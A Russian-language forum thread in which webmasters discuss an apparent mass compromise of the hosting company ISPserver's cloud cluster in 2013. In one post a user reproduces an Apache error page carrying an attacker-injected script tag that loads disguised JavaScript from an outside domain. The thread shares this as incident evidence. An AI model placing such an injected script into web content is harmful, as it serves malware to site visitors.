Массовый взлом сайтов на кластерном хостинге ISPserver

I2
На сайте с 27.07.2013
Offline
1
6802

Я являюсь клиентам ISPserver более 5 лет, держу у них более 30 клиентских сайтов.

Каково было мое удивление, когда я, зайдя на один из сайтов, увидел сообщение, что там вирус! Я обалдел! Он есть на всех сайтах!

Пытаясь разобраться, я зашел по одному из IP-адресов облачного хостинга 149.154.68.153 и увидел вирус там! Он есть на всех IP облачного хостинга!

Взломали сам СЕРВЕР ОБЛАЧНОГО ХОСТИНГА!

Звоню им, говорят ждать до понедельника. Я фигею, сайты нельзя отключить и они распространяют вирусы, и сделать ничего нельзя! Такого еще не было за всю историю российского хостинга.

Это серьезное ЧП, нужно выключить сервак, пока он весь рунет не заразил. Что делать? У кого-нибудь есть прямые контакты руководства ISPserver?

P.S. Отдельное спасибо модеру за адекватность при удалении предыдущего поста.

esetnod
На сайте с 16.07.2009
Offline
134
#1

А кудой все сообщения делись o_O ?

Быстрый хостинг на SSD от $0.99 (http://just-hosting.ru/) | OpenVZ (http://just-hosting.ru/vds.html) и KVM (http://just-hosting.ru/vds-kvm.html) VDS от $7.95
I2
На сайте с 27.07.2013
Offline
1
#2

Модер потер, до лампочки ему, что бывают случаи, когда к теме нужно привлечь внимание, т.к. проблемы информационной безопасности касаются многих вебмастеров.

Рассказываю ситуацию по состоянию на 21-55.

Вирус отдают все сервера облачного хостинга ISPserver. Если удалить все файлы - вирус отдает дефолтовая страница 404. Если сделать "deny from all" - вирус отдает 403.

Техподдержка отказывают физически отключить сервер, чтобы он не причинил вреда до прихода специалистов и предлагает ждать понедельника.

Что делать я не знаю, т.к. за выходные он может заразить кучу народа или с взломанного сервака могут слить все сайты клиентов. Круглосуточная поддержка ничего не понимает, а сисадмины уже спят, а их нужно поднять как по тревоге.

Уже раздумываю звонить "02" и вызывать на адрес датацентра...

Z
На сайте с 06.09.2012
Offline
129
#3

Восстановим сообщения.

В подтверждение, хостер кишит вирусами, safebrowsing на 149.154.68.153 не пускает:

http://www.google.com/safebrowsing/diagnostic?site=AS:29182

Cчитайте все логины и пароли всех клиентов слитыми, больше нигде их использовать нельзя. А хостер чисто по нашему проявляет полную неадекватность. Зачем нам такие хостеры?

Черный список врунов и обманщиков: ua-hosting.company, riaas.ru, takewyn.ru, yahoster/cadedic, Andreylab
I2
На сайте с 27.07.2013
Offline
1
#4

Да для хостера это большие репутационные потери, но не знаю, успею ли по FTP перекачать более 200 ГБ контента с сайтов (бекапы не можем делать чаще раза в неделю)...

То что мигом заразились более 800 сайтов это просто ЧП, жаль что поддержка ничего вообще не соображает, может позвонить в "02" и сказать, что по адресу датацентра совершается преступление (распространение вредоносного ПО для ЭВМ), чтобы хоть руководство по среди ночи подняли и они начали разбираться?

AI
На сайте с 05.05.2013
Offline
114
#5

у знакомых есть сайт на облачном ИСПсервере.

Зашёл на него. Каспер молчит. В HTML, JS бяку не увидел.

Браузер пустил нормально.

Сайт находится на кластере msk6.

Вирус появляется на ваших сайтах или на сайтах других клиентов тоже?

Как проверяли - только гуглем или антивирусом добавочно?

Регистрирую домены тут (https://order.triplix.ru/pl.php?1)!
I2
На сайте с 27.07.2013
Offline
1
#6

Вирус появляется на всех моих сайтах (30), а также на других сайтах этого хостинга, по reverse IP. Т.е. Вы можете найти все сайты на IP 149.154.68.153 и все они заражены. Кластер msk1.

Пока не пускает только браузер, но дело не в этом, ломанули апач, он внедряет вредоносный код автоматом после тега <head>.

Вот пример для страницы ошибки апача:


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
<script language="JavaScript" src="http://igri2011.ru/wp-content/themes/game/js/jquery-1.6.5.min.js" type="text/javascript"></script></head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@it.maximkhromov.ru and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.16 (Debian) Server at 149.154.68.153 Port 80</address>
</body></html>
МАНЕКА НЕКА
На сайте с 26.12.2011
Offline
55
#7
ispserver2707:

То что мигом заразились более 800 сайтов это просто ЧП

А откуда эта информация?

I2
На сайте с 27.07.2013
Offline
1
#8
МАНЕКА НЕКА:
А откуда эта информация?

Это моя оценка, вирус появился сегодня в 16 часов, и следовательно все сайты на IP который я уже называл стали одновременно раздавать вирус.

---------- Добавлено 27.07.2013 в 23:17 ----------

Я вот даже не знаю, что делать в будущем, в плане сотрудничества с ISPserver...

Иногда серьезные инциденты с ИБ или массовой аварией укрепляют хостеров.

Если авария в ДЦ - в будущем принимают меры к недопущению. Я в инете с 2006 год, помню как в Мастерхосте летом ломалась система охлаждения и ложился весь ДЦ, а жара в городе была что плавился асфальт...

Я ушел от них, а они сейчас очень стабильны.

Тоже самое про массовые взломы, ладно бы ломанули хостера из 8 "Б", но компанию такого уровня... Для кого-то это все меняет, и такое больше не допускается, а кому то бывает до лампочки. Уходить или нет?

---------- Добавлено 27.07.2013 в 23:19 ----------

Больше всего я боюсь как бы дампы баз данных не украли. Это же ЧП вселенского масштаба! Там есть телефоны, адреса, персональные данные посетителей сайтов, клиентов магазинов... Если данные попадают в третьи руки - базу заспамят, а претензии недовольные будут писать владельцем сайтов, держащих их на ISPserver.

Z
На сайте с 06.09.2012
Offline
129
#9
ispserver2707:
Больше всего я боюсь как бы дампы баз данных не украли. Это же ЧП вселенского масштаба! Там есть телефоны, адреса, персональные данные посетителей сайтов, клиентов магазинов... Если данные попадают в третьи руки - базу заспамят, а претензии недовольные будут писать владельцем сайтов, держащих их на ISPserver.

Неправильный подход. Если хостер скомпрометирован, нужно считать, что данные уже слиты. Вирус в страницах ошибок заглушек означает, что как-минимум получен рутовый доступ к серверу, а как максимум - ко всем серверам, что скорее всего.

I2
На сайте с 27.07.2013
Offline
1
#10
zzzit:
Неправильный подход. Если хостер скомпрометирован, нужно считать, что данные уже слиты. Вирус в страницах ошибок заглушек означает, что как-минимум получен рутовый доступ к серверу, а как максимум - ко всем серверам, что скорее всего.

😮😮😮

Это же просто ППЦ. Как же жить теперь? Обфусцировать все PHP-коды, и базы данных шифровать перед заливкой на продакшн?

Главное, можно взломать дедик, можно залить шелл на шаред, но как можно ломануть сразу ВЕСЬ кластер?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий